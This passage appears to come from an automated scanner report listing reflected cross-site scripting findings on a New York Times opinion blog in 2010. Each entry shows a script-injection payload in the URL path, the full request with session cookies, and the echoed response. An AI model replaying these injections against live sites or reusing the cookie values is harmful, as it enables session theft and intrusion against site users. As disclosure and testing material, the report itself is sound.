The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8f0e"><script>alert(1)</script>bf23dd493d7 was submitted in the REST URL parameter 2. This input was echoed as d8f0e\"><script>alert(1)</script>bf23dd493d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/fixesd8f0e"><script>alert(1)</script>bf23dd493d7/ HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 02:25:46 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 02:25:46 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43734
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/fixesd8f0e\"><script>alert(1)</script>bf23dd493d7&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
3.194. http://opinionator.blogs.nytimes.com/category/fixes/feed/ [REST URL parameter 3]
Summary
Severity: High
Confidence: Certain
Host: http://opinionator.blogs.nytimes.com
Path: /category/fixes/feed/
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26950"><script>alert(1)</script>349cb5c2268 was submitted in the REST URL parameter 3. This input was echoed as 26950\"><script>alert(1)</script>349cb5c2268 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/fixes/feed26950"><script>alert(1)</script>349cb5c2268/ HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
Response
HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:22:38 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:22:38 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/fixes/feed26950\"><script>alert(1)</script>349cb5c2268&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...
3.195. http://opinionator.blogs.nytimes.com/category/fixes/page/2/ [REST URL parameter 3]
Summary
Severity: High
Confidence: Certain
Host: http://opinionator.blogs.nytimes.com
Path: /category/fixes/page/2/
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66f1b"><script>alert(1)</script>7880d35a107 was submitted in the REST URL parameter 3. This input was echoed as 66f1b\"><script>alert(1)</script>7880d35a107 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/fixes/page66f1b"><script>alert(1)</script>7880d35a107/2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
Response
HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:25:26 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:25:27 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/fixes/page66f1b\"><script>alert(1)</script>7880d35a107/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,
...[SNIP]...
3.196. http://opinionator.blogs.nytimes.com/category/home-fires [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://opinionator.blogs.nytimes.com
Path: /category/home-fires
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a972"><script>alert(1)</script>0a1b042274f was submitted in the REST URL parameter 2. This input was echoed as 1a972\"><script>alert(1)</script>0a1b042274f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/home-fires1a972"><script>alert(1)</script>0a1b042274f HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
Response
HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:26:29 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:26:29 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/home-fires1a972\"><script>alert(1)</script>0a1b042274f&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...
3.197. http://opinionator.blogs.nytimes.com/category/home-fires/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://opinionator.blogs.nytimes.com
Path: /category/home-fires/
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 465db"><script>alert(1)</script>c3c7c9b644e was submitted in the REST URL parameter 2. This input was echoed as 465db\"><script>alert(1)</script>c3c7c9b644e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/home-fires465db"><script>alert(1)</script>c3c7c9b644e/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
Response
HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:26:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:26:33 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/home-fires465db\"><script>alert(1)</script>c3c7c9b644e&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...
3.198. http://opinionator.blogs.nytimes.com/category/home-fires/feed/ [REST URL parameter 3]
Summary
Severity: High
Confidence: Certain
Host: http://opinionator.blogs.nytimes.com
Path: /category/home-fires/feed/
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c78f"><script>alert(1)</script>40440eb34cb was submitted in the REST URL parameter 3. This input was echoed as 2c78f\"><script>alert(1)</script>40440eb34cb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/home-fires/feed2c78f"><script>alert(1)</script>40440eb34cb/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
Response
HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:23:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:23:43 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/home-fires/feed2c78f\"><script>alert(1)</script>40440eb34cb&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...
3.199. http://opinionator.blogs.nytimes.com/category/home-fires/page/2/ [REST URL parameter 3]
Summary
Severity: High
Confidence: Certain
Host: http://opinionator.blogs.nytimes.com
Path: /category/home-fires/page/2/
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2385"><script>alert(1)</script>2952f429861 was submitted in the REST URL parameter 3. This input was echoed as f2385\"><script>alert(1)</script>2952f429861 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/home-fires/pagef2385"><script>alert(1)</script>2952f429861/2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
Response
HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:27:40 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:27:40 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43866
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3. |